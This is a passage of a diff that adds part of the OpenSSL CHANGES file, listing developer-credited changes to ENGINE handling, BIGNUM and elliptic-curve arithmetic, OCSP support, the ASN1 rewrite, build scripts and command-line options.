+       rather than hard-coded - allowing parameterisation of these values
+       later on via ctrl() commands.
+     - Removed unused "#if 0"'d code.
+     - Fixed engine list iteration code so it uses ENGINE_free() to release
+       structural references.
+     - Constified the RAND_METHOD element of ENGINE structures.
+     - Constified various get/set functions as appropriate and added
+       missing functions (including a catch-all ENGINE_cpy that duplicates
+       all ENGINE values onto a new ENGINE except reference counts/state).
+     - Removed NULL parameter checks in get/set functions. Setting a method
+       or function to NULL is a way of cancelling out a previously set
+       value.  Passing a NULL ENGINE parameter is just plain stupid anyway
+       and doesn't justify the extra error symbols and code.
+     - Deprecate the ENGINE_FLAGS_MALLOCED define and move the area for
+       flags from engine_int.h to engine.h.
+     - Changed prototypes for ENGINE handler functions (init(), finish(),
+       ctrl(), key-load functions, etc) to take an (ENGINE*) parameter.
+     [Geoff]
+
+  *) Implement binary inversion algorithm for BN_mod_inverse in addition
+     to the algorithm using long division.  The binary algorithm can be
+     used only if the modulus is odd.  On 32-bit systems, it is faster
+     only for relatively small moduli (roughly 20-30% for 128-bit moduli,
+     roughly 5-15% for 256-bit moduli), so we use it only for moduli
+     up to 450 bits.  In 64-bit environments, the binary algorithm
+     appears to be advantageous for much longer moduli; here we use it
+     for moduli up to 2048 bits.
+     [Bodo Moeller]
+
+  *) Rewrite CHOICE field setting in ASN1_item_ex_d2i(). The old code
+     could not support the combine flag in choice fields.
+     [Steve Henson]
+
+  *) Add a 'copy_extensions' option to the 'ca' utility. This copies
+     extensions from a certificate request to the certificate.
+     [Steve Henson]
+
+  *) Allow multiple 'certopt' and 'nameopt' options to be separated
+     by commas. Add 'namopt' and 'certopt' options to the 'ca' config
+     file: this allows the display of the certificate about to be
+     signed to be customised, to allow certain fields to be included
+     or excluded and extension details. The old system didn't display
+     multicharacter strings properly, omitted fields not in the policy
+     and couldn't display additional details such as extensions.
+     [Steve Henson]
+
+  *) Function EC_POINTs_mul for multiple scalar multiplication
+     of an arbitrary number of elliptic curve points
+          \sum scalars[i]*points[i],
+     optionally including the generator defined for the EC_GROUP:
+          scalar*generator +  \sum scalars[i]*points[i].
+
+     EC_POINT_mul is a simple wrapper function for the typical case
+     that the point list has just one item (besides the optional
+     generator).
+     [Bodo Moeller]
+
+  *) First EC_METHODs for curves over GF(p):
+
+     EC_GFp_simple_method() uses the basic BN_mod_mul and BN_mod_sqr
+     operations and provides various method functions that can also
+     operate with faster implementations of modular arithmetic.     
+
+     EC_GFp_mont_method() reuses most functions that are part of
+     EC_GFp_simple_method, but uses Montgomery arithmetic.
+
+     [Bodo Moeller; point addition and point doubling
+     implementation directly derived from source code provided by
+     Lenka Fibikova <fibikova@exp-math.uni-essen.de>]
+
+  *) Framework for elliptic curves (crypto/ec/ec.h, crypto/ec/ec_lcl.h,
+     crypto/ec/ec_lib.c):
+
+     Curves are EC_GROUP objects (with an optional group generator)
+     based on EC_METHODs that are built into the library.
+
+     Points are EC_POINT objects based on EC_GROUP objects.
+
+     Most of the framework would be able to handle curves over arbitrary
+     finite fields, but as there are no obvious types for fields other
+     than GF(p), some functions are limited to that for now.
+     [Bodo Moeller]
+
+  *) Add the -HTTP option to s_server.  It is similar to -WWW, but requires
+     that the file contains a complete HTTP response.
+     [Richard Levitte]
+
+  *) Add the ec directory to mkdef.pl and mkfiles.pl. In mkdef.pl
+     change the def and num file printf format specifier from "%-40sXXX"
+     to "%-39s XXX". The latter will always guarantee a space after the
+     field while the former will cause them to run together if the field
+     is 40 of more characters long.
+     [Steve Henson]
+
+  *) Constify the cipher and digest 'method' functions and structures
+     and modify related functions to take constant EVP_MD and EVP_CIPHER
+     pointers.
+     [Steve Henson]
+
+  *) Hide BN_CTX structure details in bn_lcl.h instead of publishing them
+     in <openssl/bn.h>.  Also further increase BN_CTX_NUM to 32.
+     [Bodo Moeller]
+
+  *) Modify EVP_Digest*() routines so they now return values. Although the
+     internal software routines can never fail additional hardware versions
+     might.
+     [Steve Henson]
+
+  *) Clean up crypto/err/err.h and change some error codes to avoid conflicts:
+
+     Previously ERR_R_FATAL was too small and coincided with ERR_LIB_PKCS7
+     (= ERR_R_PKCS7_LIB); it is now 64 instead of 32.
+
+     ASN1 error codes
+          ERR_R_NESTED_ASN1_ERROR
+          ...
+          ERR_R_MISSING_ASN1_EOS
+     were 4 .. 9, conflicting with
+          ERR_LIB_RSA (= ERR_R_RSA_LIB)
+          ...
+          ERR_LIB_PEM (= ERR_R_PEM_LIB).
+     They are now 58 .. 63 (i.e., just below ERR_R_FATAL).
+
+     Add new error code 'ERR_R_INTERNAL_ERROR'.
+     [Bodo Moeller]
+
+  *) Don't overuse locks in crypto/err/err.c: For data retrieval, CRYPTO_r_lock
+     suffices.
+     [Bodo Moeller]
+
+  *) New option '-subj arg' for 'openssl req' and 'openssl ca'.  This
+     sets the subject name for a new request or supersedes the
+     subject name in a given request. Formats that can be parsed are
+          'CN=Some Name, OU=myOU, C=IT'
+     and
+          'CN=Some Name/OU=myOU/C=IT'.
+
+     Add options '-batch' and '-verbose' to 'openssl req'.
+     [Massimiliano Pala <madwolf@hackmasters.net>]
+
+  *) Introduce the possibility to access global variables through
+     functions on platform were that's the best way to handle exporting
+     global variables in shared libraries.  To enable this functionality,
+     one must configure with "EXPORT_VAR_AS_FN" or defined the C macro
+     "OPENSSL_EXPORT_VAR_AS_FUNCTION" in crypto/opensslconf.h (the latter
+     is normally done by Configure or something similar).
+
+     To implement a global variable, use the macro OPENSSL_IMPLEMENT_GLOBAL
+     in the source file (foo.c) like this:
+
+	OPENSSL_IMPLEMENT_GLOBAL(int,foo)=1;
+	OPENSSL_IMPLEMENT_GLOBAL(double,bar);
+
+     To declare a global variable, use the macros OPENSSL_DECLARE_GLOBAL
+     and OPENSSL_GLOBAL_REF in the header file (foo.h) like this:
+
+	OPENSSL_DECLARE_GLOBAL(int,foo);
+	#define foo OPENSSL_GLOBAL_REF(foo)
+	OPENSSL_DECLARE_GLOBAL(double,bar);
+	#define bar OPENSSL_GLOBAL_REF(bar)
+
+     The #defines are very important, and therefore so is including the
+     header file everywhere where the defined globals are used.
+
+     The macro OPENSSL_EXPORT_VAR_AS_FUNCTION also affects the definition
+     of ASN.1 items, but that structure is a bit different.
+
+     The largest change is in util/mkdef.pl which has been enhanced with
+     better and easier to understand logic to choose which symbols should
+     go into the Windows .def files as well as a number of fixes and code
+     cleanup (among others, algorithm keywords are now sorted
+     lexicographically to avoid constant rewrites).
+     [Richard Levitte]
+
+  *) In BN_div() keep a copy of the sign of 'num' before writing the
+     result to 'rm' because if rm==num the value will be overwritten
+     and produce the wrong result if 'num' is negative: this caused
+     problems with BN_mod() and BN_nnmod().
+     [Steve Henson]
+
+  *) Function OCSP_request_verify(). This checks the signature on an
+     OCSP request and verifies the signer certificate. The signer
+     certificate is just checked for a generic purpose and OCSP request
+     trust settings.
+     [Steve Henson]
+
+  *) Add OCSP_check_validity() function to check the validity of OCSP
+     responses. OCSP responses are prepared in real time and may only
+     be a few seconds old. Simply checking that the current time lies
+     between thisUpdate and nextUpdate max reject otherwise valid responses
+     caused by either OCSP responder or client clock inaccuracy. Instead
+     we allow thisUpdate and nextUpdate to fall within a certain period of
+     the current time. The age of the response can also optionally be
+     checked. Two new options -validity_period and -status_age added to
+     ocsp utility.
+     [Steve Henson]
+
+  *) If signature or public key algorithm is unrecognized print out its
+     OID rather that just UNKNOWN.
+     [Steve Henson]
+
+  *) Change OCSP_cert_to_id() to tolerate a NULL subject certificate and
+     OCSP_cert_id_new() a NULL serialNumber. This allows a partial certificate
+     ID to be generated from the issuer certificate alone which can then be
+     passed to OCSP_id_issuer_cmp().
+     [Steve Henson]
+
+  *) New compilation option ASN1_ITEM_FUNCTIONS. This causes the new
+     ASN1 modules to export functions returning ASN1_ITEM pointers
+     instead of the ASN1_ITEM structures themselves. This adds several
+     new macros which allow the underlying ASN1 function/structure to
+     be accessed transparently. As a result code should not use ASN1_ITEM
+     references directly (such as &X509_it) but instead use the relevant
+     macros (such as ASN1_ITEM_rptr(X509)). This option is to allow
+     use of the new ASN1 code on platforms where exporting structures
+     is problematical (for example in shared libraries) but exporting
+     functions returning pointers to structures is not.
+     [Steve Henson]
+
+  *) Add support for overriding the generation of SSL/TLS session IDs.
+     These callbacks can be registered either in an SSL_CTX or per SSL.
+     The purpose of this is to allow applications to control, if they wish,
+     the arbitrary values chosen for use as session IDs, particularly as it
+     can be useful for session caching in multiple-server environments. A
+     command-line switch for testing this (and any client code that wishes
+     to use such a feature) has been added to "s_server".
+     [Geoff Thorpe, Lutz Jaenicke]
+
+  *) Modify mkdef.pl to recognise and parse preprocessor conditionals
+     of the form '#if defined(...) || defined(...) || ...' and
+     '#if !defined(...) && !defined(...) && ...'.  This also avoids
+     the growing number of special cases it was previously handling.
+     [Richard Levitte]
+
+  *) Make all configuration macros available for application by making
+     sure they are available in opensslconf.h, by giving them names starting
+     with "OPENSSL_" to avoid conflicts with other packages and by making
+     sure e_os2.h will cover all platform-specific cases together with
+     opensslconf.h.
+     Additionally, it is now possible to define configuration/platform-
+     specific names (called "system identities").  In the C code, these
+     are prefixed with "OPENSSL_SYSNAME_".  e_os2.h will create another
+     macro with the name beginning with "OPENSSL_SYS_", which is determined
+     from "OPENSSL_SYSNAME_*" or compiler-specific macros depending on
+     what is available.
+     [Richard Levitte]
+
+  *) New option -set_serial to 'req' and 'x509' this allows the serial
+     number to use to be specified on the command line. Previously self
+     signed certificates were hard coded with serial number 0 and the 
+     CA options of 'x509' had to use a serial number in a file which was
+     auto incremented.
+     [Steve Henson]
+
+  *) New options to 'ca' utility to support V2 CRL entry extensions.
+     Currently CRL reason, invalidity date and hold instruction are
+     supported. Add new CRL extensions to V3 code and some new objects.
+     [Steve Henson]
+
+  *) New function EVP_CIPHER_CTX_set_padding() this is used to
+     disable standard block padding (aka PKCS#5 padding) in the EVP
+     API, which was previously mandatory. This means that the data is
+     not padded in any way and so the total length much be a multiple
+     of the block size, otherwise an error occurs.
+     [Steve Henson]
+
+  *) Initial (incomplete) OCSP SSL support.
+     [Steve Henson]
+
+  *) New function OCSP_parse_url(). This splits up a URL into its host,
+     port and path components: primarily to parse OCSP URLs. New -url
+     option to ocsp utility.
+     [Steve Henson]
+
+  *) New nonce behavior. The return value of OCSP_check_nonce() now 
+     reflects the various checks performed. Applications can decide
+     whether to tolerate certain situations such as an absent nonce
+     in a response when one was present in a request: the ocsp application
+     just prints out a warning. New function OCSP_add1_basic_nonce()
+     this is to allow responders to include a nonce in a response even if
+     the request is nonce-less.
+     [Steve Henson]
+
+  *) Disable stdin buffering in load_cert (apps/apps.c) so that no certs are
+     skipped when using openssl x509 multiple times on a single input file,
+     e.g. "(openssl x509 -out cert1; openssl x509 -out cert2) <certs".
+     [Bodo Moeller]
+
+  *) Make ASN1_UTCTIME_set_string() and ASN1_GENERALIZEDTIME_set_string()
+     set string type: to handle setting ASN1_TIME structures. Fix ca
+     utility to correctly initialize revocation date of CRLs.
+     [Steve Henson]
+
+  *) New option SSL_OP_CIPHER_SERVER_PREFERENCE allows the server to override
+     the clients preferred ciphersuites and rather use its own preferences.
+     Should help to work around M$ SGC (Server Gated Cryptography) bug in
+     Internet Explorer by ensuring unchanged hash method during stepup.
+     (Also replaces the broken/deactivated SSL_OP_NON_EXPORT_FIRST option.)
+     [Lutz Jaenicke]
+
+  *) Make mkdef.pl recognise all DECLARE_ASN1 macros, change rijndael
+     to aes and add a new 'exist' option to print out symbols that don't
+     appear to exist.
+     [Steve Henson]
+
+  *) Additional options to ocsp utility to allow flags to be set and
+     additional certificates supplied.
+     [Steve Henson]
+
+  *) Add the option -VAfile to 'openssl ocsp', so the user can give the
+     OCSP client a number of certificate to only verify the response
+     signature against.
+     [Richard Levitte]
+
+  *) Update Rijndael code to version 3.0 and change EVP AES ciphers to
+     handle the new API. Currently only ECB, CBC modes supported. Add new
+     AES OIDs.
+
+     Add TLS AES ciphersuites as described in RFC3268, "Advanced
+     Encryption Standard (AES) Ciphersuites for Transport Layer
+     Security (TLS)".  (In beta versions of OpenSSL 0.9.7, these were
+     not enabled by default and were not part of the "ALL" ciphersuite
+     alias because they were not yet official; they could be
+     explicitly requested by specifying the "AESdraft" ciphersuite
+     group alias.  In the final release of OpenSSL 0.9.7, the group
+     alias is called "AES" and is part of "ALL".)
+     [Ben Laurie, Steve  Henson, Bodo Moeller]
+
+  *) New function OCSP_copy_nonce() to copy nonce value (if present) from
+     request to response.
+     [Steve Henson]
+
+  *) Functions for OCSP responders. OCSP_request_onereq_count(),
+     OCSP_request_onereq_get0(), OCSP_onereq_get0_id() and OCSP_id_get0_info()
+     extract information from a certificate request. OCSP_response_create()
+     creates a response and optionally adds a basic response structure.
+     OCSP_basic_add1_status() adds a complete single response to a basic
+     response and returns the OCSP_SINGLERESP structure just added (to allow
+     extensions to be included for example). OCSP_basic_add1_cert() adds a
+     certificate to a basic response and OCSP_basic_sign() signs a basic
+     response with various flags. New helper functions ASN1_TIME_check()
+     (checks validity of ASN1_TIME structure) and ASN1_TIME_to_generalizedtime()
+     (converts ASN1_TIME to GeneralizedTime).
+     [Steve Henson]
+
+  *) Various new functions. EVP_Digest() combines EVP_Digest{Init,Update,Final}()
+     in a single operation. X509_get0_pubkey_bitstr() extracts the public_key
+     structure from a certificate. X509_pubkey_digest() digests the public_key
+     contents: this is used in various key identifiers. 
+     [Steve Henson]
+
+  *) Make sk_sort() tolerate a NULL argument.
+     [Steve Henson reported by Massimiliano Pala <madwolf@comune.modena.it>]
+
+  *) New OCSP verify flag OCSP_TRUSTOTHER. When set the "other" certificates
+     passed by the function are trusted implicitly. If any of them signed the
+     response then it is assumed to be valid and is not verified.
+     [Steve Henson]
+
+  *) In PKCS7_set_type() initialise content_type in PKCS7_ENC_CONTENT
+     to data. This was previously part of the PKCS7 ASN1 code. This
+     was causing problems with OpenSSL created PKCS#12 and PKCS#7 structures.
+     [Steve Henson, reported by Kenneth R. Robinette
+				<support@securenetterm.com>]
+
+  *) Add CRYPTO_push_info() and CRYPTO_pop_info() calls to new ASN1
+     routines: without these tracing memory leaks is very painful.
+     Fix leaks in PKCS12 and PKCS7 routines.
+     [Steve Henson]
+
+  *) Make X509_time_adj() cope with the new behaviour of ASN1_TIME_new().
+     Previously it initialised the 'type' argument to V_ASN1_UTCTIME which
+     effectively meant GeneralizedTime would never be used. Now it
+     is initialised to -1 but X509_time_adj() now has to check the value
+     and use ASN1_TIME_set() if the value is not V_ASN1_UTCTIME or
+     V_ASN1_GENERALIZEDTIME, without this it always uses GeneralizedTime.
+     [Steve Henson, reported by Kenneth R. Robinette
+				<support@securenetterm.com>]
+
+  *) Fixes to BN_to_ASN1_INTEGER when bn is zero. This would previously
+     result in a zero length in the ASN1_INTEGER structure which was
+     not consistent with the structure when d2i_ASN1_INTEGER() was used
+     and would cause ASN1_INTEGER_cmp() to fail. Enhance s2i_ASN1_INTEGER()
+     to cope with hex and negative integers. Fix bug in i2a_ASN1_INTEGER()
+     where it did not print out a minus for negative ASN1_INTEGER.
+     [Steve Henson]
+
+  *) Add summary printout to ocsp utility. The various functions which
+     convert status values to strings have been renamed to:
+     OCSP_response_status_str(), OCSP_cert_status_str() and
+     OCSP_crl_reason_str() and are no longer static. New options
+     to verify nonce values and to disable verification. OCSP response
+     printout format cleaned up.
+     [Steve Henson]
+
+  *) Add additional OCSP certificate checks. These are those specified
+     in RFC2560. This consists of two separate checks: the CA of the
+     certificate being checked must either be the OCSP signer certificate
+     or the issuer of the OCSP signer certificate. In the latter case the
+     OCSP signer certificate must contain the OCSP signing extended key
+     usage. This check is performed by attempting to match the OCSP
+     signer or the OCSP signer CA to the issuerNameHash and issuerKeyHash
+     in the OCSP_CERTID structures of the response.
+     [Steve Henson]
+
+  *) Initial OCSP certificate verification added to OCSP_basic_verify()
+     and related routines. This uses the standard OpenSSL certificate
+     verify routines to perform initial checks (just CA validity) and
+     to obtain the certificate chain. Then additional checks will be
+     performed on the chain. Currently the root CA is checked to see
+     if it is explicitly trusted for OCSP signing. This is used to set
+     a root CA as a global signing root: that is any certificate that
+     chains to that CA is an acceptable OCSP signing certificate.
+     [Steve Henson]
+
+  *) New '-extfile ...' option to 'openssl ca' for reading X.509v3
+     extensions from a separate configuration file.
+     As when reading extensions from the main configuration file,
+     the '-extensions ...' option may be used for specifying the
+     section to use.
+     [Massimiliano Pala <madwolf@comune.modena.it>]
+
+  *) New OCSP utility. Allows OCSP requests to be generated or
+     read. The request can be sent to a responder and the output
+     parsed, outputed or printed in text form. Not complete yet:
+     still needs to check the OCSP response validity.
+     [Steve Henson]
+
+  *) New subcommands for 'openssl ca':
+     'openssl ca -status <serial>' prints the status of the cert with
+     the given serial number (according to the index file).
+     'openssl ca -updatedb' updates the expiry status of certificates
+     in the index file.
+     [Massimiliano Pala <madwolf@comune.modena.it>]
+
+  *) New '-newreq-nodes' command option to CA.pl.  This is like
+     '-newreq', but calls 'openssl req' with the '-nodes' option
+     so that the resulting key is not encrypted.
+     [Damien Miller <djm@mindrot.org>]
+
+  *) New configuration for the GNU Hurd.
+     [Jonathan Bartlett <johnnyb@wolfram.com> via Richard Levitte]
+
+  *) Initial code to implement OCSP basic response verify. This
+     is currently incomplete. Currently just finds the signer's
+     certificate and verifies the signature on the response.
+     [Steve Henson]
+
+  *) New SSLeay_version code SSLEAY_DIR to determine the compiled-in
+     value of OPENSSLDIR.  This is available via the new '-d' option
+     to 'openssl version', and is also included in 'openssl version -a'.
+     [Bodo Moeller]
+
+  *) Allowing defining memory allocation callbacks that will be given
+     file name and line number information in additional arguments
+     (a const char* and an int).  The basic functionality remains, as
+     well as the original possibility to just replace malloc(),
+     realloc() and free() by functions that do not know about these
+     additional arguments.  To register and find out the current
+     settings for extended allocation functions, the following
+     functions are provided:
+
+	CRYPTO_set_mem_ex_functions
+	CRYPTO_set_locked_mem_ex_functions
+	CRYPTO_get_mem_ex_functions
+	CRYPTO_get_locked_mem_ex_functions
+
+     These work the same way as CRYPTO_set_mem_functions and friends.
+     CRYPTO_get_[locked_]mem_functions now writes 0 where such an
+     extended allocation function is enabled.
+     Similarly, CRYPTO_get_[locked_]mem_ex_functions writes 0 where
+     a conventional allocation function is enabled.
+     [Richard Levitte, Bodo Moeller]
+
+  *) Finish off removing the remaining LHASH function pointer casts.
+     There should no longer be any prototype-casting required when using
+     the LHASH abstraction, and any casts that remain are "bugs". See
+     the callback types and macros at the head of lhash.h for details
+     (and "OBJ_cleanup" in crypto/objects/obj_dat.c as an example).
+     [Geoff Thorpe]
+
+  *) Add automatic query of EGD sockets in RAND_poll() for the unix variant.
+     If /dev/[u]random devices are not available or do not return enough
+     entropy, EGD style sockets (served by EGD or PRNGD) will automatically
+     be queried.
+     The locations /var/run/egd-pool, /dev/egd-pool, /etc/egd-pool, and
+     /etc/entropy will be queried once each in this sequence, quering stops
+     when enough entropy was collected without querying more sockets.
+     [Lutz Jaenicke]
+
+  *) Change the Unix RAND_poll() variant to be able to poll several
+     random devices, as specified by DEVRANDOM, until a sufficient amount
+     of data has been collected.   We spend at most 10 ms on each file
+     (select timeout) and read in non-blocking mode.  DEVRANDOM now
+     defaults to the list "/dev/urandom", "/dev/random", "/dev/srandom"
+     (previously it was just the string "/dev/urandom"), so on typical
+     platforms the 10 ms delay will never occur.
+     Also separate out the Unix variant to its own file, rand_unix.c.
+     For VMS, there's a currently-empty rand_vms.c.
+     [Richard Levitte]
+
+  *) Move OCSP client related routines to ocsp_cl.c. These
+     provide utility functions which an application needing
+     to issue a request to an OCSP responder and analyse the
+     response will typically need: as opposed to those which an
+     OCSP responder itself would need which will be added later.
+
+     OCSP_request_sign() signs an OCSP request with an API similar
+     to PKCS7_sign(). OCSP_response_status() returns status of OCSP
+     response. OCSP_response_get1_basic() extracts basic response
+     from response. OCSP_resp_find_status(): finds and extracts status
+     information from an OCSP_CERTID structure (which will be created
+     when the request structure is built). These are built from lower
+     level functions which work on OCSP_SINGLERESP structures but
+     wont normally be used unless the application wishes to examine
+     extensions in the OCSP response for example.
+
+     Replace nonce routines with a pair of functions.
+     OCSP_request_add1_nonce() adds a nonce value and optionally
+     generates a random value. OCSP_check_nonce() checks the
+     validity of the nonce in an OCSP response.
+     [Steve Henson]
+
+  *) Change function OCSP_request_add() to OCSP_request_add0_id().
+     This doesn't copy the supplied OCSP_CERTID and avoids the
+     need to free up the newly created id. Change return type
+     to OCSP_ONEREQ to return the internal OCSP_ONEREQ structure.
+     This can then be used to add extensions to the request.
+     Deleted OCSP_request_new(), since most of its functionality
+     is now in OCSP_REQUEST_new() (and the case insensitive name
+     clash) apart from the ability to set the request name which
+     will be added elsewhere.
+     [Steve Henson]
+
+  *) Update OCSP API. Remove obsolete extensions argument from
+     various functions. Extensions are now handled using the new
+     OCSP extension code. New simple OCSP HTTP function which 
+     can be used to send requests and parse the response.
+     [Steve Henson]
+
+  *) Fix the PKCS#7 (S/MIME) code to work with new ASN1. Two new
+     ASN1_ITEM structures help with sign and verify. PKCS7_ATTR_SIGN
+     uses the special reorder version of SET OF to sort the attributes
+     and reorder them to match the encoded order. This resolves a long
+     standing problem: a verify on a PKCS7 structure just after signing
+     it used to fail because the attribute order did not match the
+     encoded order. PKCS7_ATTR_VERIFY does not reorder the attributes:
+     it uses the received order. This is necessary to tolerate some broken
+     software that does not order SET OF. This is handled by encoding
+     as a SEQUENCE OF but using implicit tagging (with UNIVERSAL class)
+     to produce the required SET OF.
+     [Steve Henson]
+
+  *) Have mk1mf.pl generate the macros OPENSSL_BUILD_SHLIBCRYPTO and
+     OPENSSL_BUILD_SHLIBSSL and use them appropriately in the header
+     files to get correct declarations of the ASN.1 item variables.
+     [Richard Levitte]
+
+  *) Rewrite of PKCS#12 code to use new ASN1 functionality. Replace many
+     PKCS#12 macros with real functions. Fix two unrelated ASN1 bugs:
+     asn1_check_tlen() would sometimes attempt to use 'ctx' when it was
+     NULL and ASN1_TYPE was not dereferenced properly in asn1_ex_c2i().
+     New ASN1 macro: DECLARE_ASN1_ITEM() which just declares the relevant
+     ASN1_ITEM and no wrapper functions.
+     [Steve Henson]
+
+  *) New functions or ASN1_item_d2i_fp() and ASN1_item_d2i_bio(). These
+     replace the old function pointer based I/O routines. Change most of
+     the *_d2i_bio() and *_d2i_fp() functions to use these.
+     [Steve Henson]
+
+  *) Enhance mkdef.pl to be more accepting about spacing in C preprocessor
+     lines, recognice more "algorithms" that can be deselected, and make
+     it complain about algorithm deselection that isn't recognised.
+     [Richard Levitte]
+
+  *) New ASN1 functions to handle dup, sign, verify, digest, pack and
+     unpack operations in terms of ASN1_ITEM. Modify existing wrappers
+     to use new functions. Add NO_ASN1_OLD which can be set to remove
+     some old style ASN1 functions: this can be used to determine if old
+     code will still work when these eventually go away.
+     [Steve Henson]
+
+  *) New extension functions for OCSP structures, these follow the
+     same conventions as certificates and CRLs.
+     [Steve Henson]
+
+  *) New function X509V3_add1_i2d(). This automatically encodes and
+     adds an extension. Its behaviour can be customised with various
+     flags to append, replace or delete. Various wrappers added for
+     certifcates and CRLs.
+     [Steve Henson]
+
+  *) Fix to avoid calling the underlying ASN1 print routine when
+     an extension cannot be parsed. Correct a typo in the
+     OCSP_SERVICELOC extension. Tidy up print OCSP format.
+     [Steve Henson]
+
+  *) Make mkdef.pl parse some of the ASN1 macros and add apropriate
+     entries for variables.
+     [Steve Henson]
+
+  *) Add functionality to apps/openssl.c for detecting locking
+     problems: As the program is single-threaded, all we have
+     to do is register a locking callback using an array for
+     storing which locks are currently held by the program.
+     [Bodo Moeller]
+
+  *) Use a lock around the call to CRYPTO_get_ex_new_index() in
+     SSL_get_ex_data_X509_STORE_idx(), which is used in
+     ssl_verify_cert_chain() and thus can be called at any time
+     during TLS/SSL handshakes so that thread-safety is essential.
+     Unfortunately, the ex_data design is not at all suited
+     for multi-threaded use, so it probably should be abolished.
+     [Bodo Moeller]
+
+  *) Added Broadcom "ubsec" ENGINE to OpenSSL.
+     [Broadcom, tweaked and integrated by Geoff Thorpe]
+
+  *) Move common extension printing code to new function
+     X509V3_print_extensions(). Reorganise OCSP print routines and
+     implement some needed OCSP ASN1 functions. Add OCSP extensions.
+     [Steve Henson]
+
+  *) New function X509_signature_print() to remove duplication in some
+     print routines.
+     [Steve Henson]
+
+  *) Add a special meaning when SET OF and SEQUENCE OF flags are both
+     set (this was treated exactly the same as SET OF previously). This
+     is used to reorder the STACK representing the structure to match the
+     encoding. This will be used to get round a problem where a PKCS7
+     structure which was signed could not be verified because the STACK
+     order did not reflect the encoded order.
+     [Steve Henson]
+
+  *) Reimplement the OCSP ASN1 module using the new code.
+     [Steve Henson]
+
+  *) Update the X509V3 code to permit the use of an ASN1_ITEM structure
+     for its ASN1 operations. The old style function pointers still exist
+     for now but they will eventually go away.
+     [Steve Henson]
+
+  *) Merge in replacement ASN1 code from the ASN1 branch. This almost
+     completely replaces the old ASN1 functionality with a table driven
+     encoder and decoder which interprets an ASN1_ITEM structure describing
+     the ASN1 module. Compatibility with the existing ASN1 API (i2d,d2i) is
+     largely maintained. Almost all of the old asn1_mac.h macro based ASN1
+     has also been converted to the new form.
+     [Steve Henson]
+
+  *) Change BN_mod_exp_recp so that negative moduli are tolerated
+     (the sign is ignored).  Similarly, ignore the sign in BN_MONT_CTX_set
+     so that BN_mod_exp_mont and BN_mod_exp_mont_word work
+     for negative moduli.
+     [Bodo Moeller]
+
+  *) Fix BN_uadd and BN_usub: Always return non-negative results instead
+     of not touching the result's sign bit.
+     [Bodo Moeller]
+
+  *) BN_div bugfix: If the result is 0, the sign (res->neg) must not be
+     set.
+     [Bodo Moeller]
+
+  *) Changed the LHASH code to use prototypes for callbacks, and created
+     macros to declare and implement thin (optionally static) functions
+     that provide type-safety and avoid function pointer casting for the
+     type-specific callbacks.
+     [Geoff Thorpe]
+
+  *) Added Kerberos Cipher Suites to be used with TLS, as written in
+     RFC 2712.
+     [Veers Staats <staatsvr@asc.hpc.mil>,
+      Jeffrey Altman <jaltman@columbia.edu>, via Richard Levitte]
+
+  *) Reformat the FAQ so the different questions and answers can be divided
+     in sections depending on the subject.
+     [Richard Levitte]
+
+  *) Have the zlib compression code load ZLIB.DLL dynamically under
+     Windows.
+     [Richard Levitte]
+
+  *) New function BN_mod_sqrt for computing square roots modulo a prime
+     (using the probabilistic Tonelli-Shanks algorithm unless
+     p == 3 (mod 4)  or  p == 5 (mod 8),  which are cases that can
+     be handled deterministically).
+     [Lenka Fibikova <fibikova@exp-math.uni-essen.de>, Bodo Moeller]
+
+  *) Make BN_mod_inverse faster by explicitly handling small quotients
+     in the Euclid loop. (Speed gain about 20% for small moduli [256 or
+     512 bits], about 30% for larger ones [1024 or 2048 bits].)
+     [Bodo Moeller]
+
+  *) New function BN_kronecker.
+     [Bodo Moeller]
+
+  *) Fix BN_gcd so that it works on negative inputs; the result is
+     positive unless both parameters are zero.
+     Previously something reasonably close to an infinite loop was
+     possible because numbers could be growing instead of shrinking
+     in the implementation of Euclid's algorithm.
+     [Bodo Moeller]
+
+  *) Fix BN_is_word() and BN_is_one() macros to take into account the
+     sign of the number in question.
+
+     Fix BN_is_word(a,w) to work correctly for w == 0.
+
+     The old BN_is_word(a,w) macro is now called BN_abs_is_word(a,w)
+     because its test if the absolute value of 'a' equals 'w'.
+     Note that BN_abs_is_word does *not* handle w == 0 reliably;
+     it exists mostly for use in the implementations of BN_is_zero(),
+     BN_is_one(), and BN_is_word().
+     [Bodo Moeller]
+
+  *) New function BN_swap.
+     [Bodo Moeller]
+
+  *) Use BN_nnmod instead of BN_mod in crypto/bn/bn_exp.c so that
+     the exponentiation functions are more likely to produce reasonable
+     results on negative inputs.
+     [Bodo Moeller]
+
+  *) Change BN_mod_mul so that the result is always non-negative.
+     Previously, it could be negative if one of the factors was negative;
+     I don't think anyone really wanted that behaviour.
+     [Bodo Moeller]
+
+  *) Move BN_mod_... functions into new file crypto/bn/bn_mod.c
+     (except for exponentiation, which stays in crypto/bn/bn_exp.c,
+     and BN_mod_mul_reciprocal, which stays in crypto/bn/bn_recp.c)
+     and add new functions:
+
+          BN_nnmod
+          BN_mod_sqr
+          BN_mod_add
+          BN_mod_add_quick
+          BN_mod_sub
+          BN_mod_sub_quick
+          BN_mod_lshift1
+          BN_mod_lshift1_quick
+          BN_mod_lshift
+          BN_mod_lshift_quick
+
+     These functions always generate non-negative results.
+
+     BN_nnmod otherwise is like BN_mod (if BN_mod computes a remainder  r
+     such that  |m| < r < 0,  BN_nnmod will output  rem + |m|  instead).
+
+     BN_mod_XXX_quick(r, a, [b,] m) generates the same result as
+     BN_mod_XXX(r, a, [b,] m, ctx), but requires that  a  [and  b]
+     be reduced modulo  m.
+     [Lenka Fibikova <fibikova@exp-math.uni-essen.de>, Bodo Moeller]
+
+#if 0
+     The following entry accidentily appeared in the CHANGES file
+     distributed with OpenSSL 0.9.7.  The modifications described in
+     it do *not* apply to OpenSSL 0.9.7.
+
+  *) Remove a few calls to bn_wexpand() in BN_sqr() (the one in there
+     was actually never needed) and in BN_mul().  The removal in BN_mul()
+     required a small change in bn_mul_part_recursive() and the addition
+     of the functions bn_cmp_part_words(), bn_sub_part_words() and
+     bn_add_part_words(), which do the same thing as bn_cmp_words(),
+     bn_sub_words() and bn_add_words() except they take arrays with
+     differing sizes.
+     [Richard Levitte]
+#endif
+
+  *) In 'openssl passwd', verify passwords read from the terminal
+     unless the '-salt' option is used (which usually means that
+     verification would just waste user's time since the resulting
+     hash is going to be compared with some given password hash)
+     or the new '-noverify' option is used.
+
+     This is an incompatible change, but it does not affect
+     non-interactive use of 'openssl passwd' (passwords on the command
+     line, '-stdin' option, '-in ...' option) and thus should not
+     cause any problems.
+     [Bodo Moeller]
+
+  *) Remove all references to RSAref, since there's no more need for it.
+     [Richard Levitte]
+
